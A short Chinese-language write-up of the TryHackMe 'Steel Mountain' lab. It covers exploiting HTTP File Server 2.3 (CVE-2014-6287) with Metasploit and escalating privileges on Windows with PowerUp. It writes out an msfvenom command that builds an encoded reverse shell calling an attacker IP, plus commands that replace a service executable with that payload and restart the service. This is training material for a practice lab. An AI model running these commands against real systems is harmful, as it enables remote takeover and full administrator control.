0%

THM打靶日寄2-steel mountain

  • 初期信息搜集

    两个网站端口,80显示了当前值班的员工,8080是本次的重点 HTTP file server 2.3

    这个最近刚出了 CVE ,但考的是 CVE-2014-6287

    msf 直接打就行,注意端口冲突

    进去后去桌面翻一翻,找到flag

  • PowerUP 实现 Windows 提权

    通过向目标靶机上传并运行 PowerUP 脚本来检测把集中可能存在的服务器脆弱点

    PowerUP脚本下载

    通过 metepreter 会话来上传并执行:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    upload /home/kali/Desktop/PowerUp.ps1

    load powershell # 加载powershell脚本

    powershell_shell # 进入

    Import-Module .\PowerUp.ps1

    Invoke-AllChecks

    注意这里,扫描到了可以重启的服务,即 CanRestarttrue 。那么就像linux提权一样,用恶意程序覆盖当前的 ASCService 并重启就能执行提取

    那么直接 msfvenom 生成个同名的木马 msfvenom -p windows/shell_reverse_tcp LHOST=10.11.99.99 LPORT=1233 -e x86/shikata_ga_nai -f exe -o ASCService.exe

    上传后用终端终止原进程并替换成木马:

    1
    2
    3
    sc stop AdvancedSystemCareService9

    copy ASCService.exe "\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"

    然后监听端口,并用 sc start 启动进程

    获得管理员权限后在 Administrator/Desktop 找到 root.txt